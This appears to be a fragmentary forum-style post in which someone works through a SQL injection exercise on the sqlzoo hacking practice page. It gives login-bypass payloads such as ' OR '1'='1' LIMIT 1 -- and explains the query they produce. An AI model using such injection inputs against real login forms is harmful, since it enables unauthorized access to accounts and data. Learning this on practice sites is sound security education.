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I’m following this page: http://sqlzoo.net/hack/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followed the section called “SQL Injection Based on “”=”” is Always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format I came up is the thing below and should be the same format as the example on the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' OR '1'='1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 ' OR '1'='1' LIMIT 1 --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technically don’t need the 1 inside ‘ ‘ but I just did for easier viewing.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 1 limits the search to just the first row and ‘--’ is to comment out the ‘ that follows the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when you type those stuff in, the query would look like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SQL query: SELECT * FROM users WHERE username='' OR ''='' AND password='' OR '1'='1' LIMIT 1 --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